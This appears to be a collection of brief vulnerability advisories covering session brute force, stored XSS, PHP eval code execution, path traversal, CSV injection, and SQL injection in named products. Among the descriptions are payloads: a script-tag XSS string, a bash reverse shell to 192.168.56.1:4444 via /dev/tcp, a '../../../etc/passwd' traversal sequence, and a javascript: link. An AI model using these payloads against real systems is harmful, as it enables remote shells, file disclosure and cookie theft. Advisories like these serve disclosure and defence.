The Session ID 'SessionId' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and disclose the live camera stream.
This vulnerability allows an attacker to inject malicious payloads in the Chat section. Each time an admin or user visits and manages the user data, the malicious payload (XSS) triggers, and the attacker can capture the admin cookies and access the users' data.
A stored XSS vulnerability exists in the /_core/profile/ URL when the avatar[path] parameter is used in a POST request. The payload used is: '><sCrIpT>alert(1)</sCrIpT>
The vulnerability is present in 'editusertag.php' at line #93, where the user input is used in the PHP eval() function. Reproduction Steps: 1. Login as administrator user and navigate to Extensions->User Defined Tags. 2. Add code with the payload of: exec('/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1''); 3. Click on the newly created User Defined Tag and use the Run function. RCE will be achieved.
A vulnerability exists in sar2html 3.2.1 which allows an attacker to execute arbitrary code on the vulnerable system. This is due to the application not properly validating user-supplied input before using it in a system call. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable server. Successful exploitation of this vulnerability could result in arbitrary code execution on the vulnerable system.
A path traversal vulnerability in Advanced Comment System (ACS) v1.0 allows an attacker to read arbitrary files on the server by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../etc/passwd') in the 'ACS_path' parameter.
Knockpy, as part of its subdomain brute-forcing flow against a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc. When the -c flag is used to store the results as a CSV file, this data is reflected into the file with the Server HTTP response header unfiltered. An attacker can use a malicious Nginx config to return headers containing CSV formulas, which can be used to inject malicious code into the CSV file.
Mantis Bug Tracker 2.24.3 is vulnerable to SQL injection in the 'access' parameter of the mc_project_get_users SOAP API. An attacker can exploit this vulnerability to gain access to the application's database, allowing them to view, modify, or delete data.
This vulnerability allows an attacker to inject an XSS payload into the IMAGE URL. Each time any user goes to that URL, the XSS triggers, and the attacker is able to steal the cookie according to the crafted payload.
WordPress before 5.2.3 allows XSS in post previews by authenticated users. The vulnerability is due to two conditions: 1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be bypassed and can lead to a cross-site scripting vulnerability. This allows an attacker to inject attack strings such as: <a href="javascript:alert(document.domain)">Example Attack</a>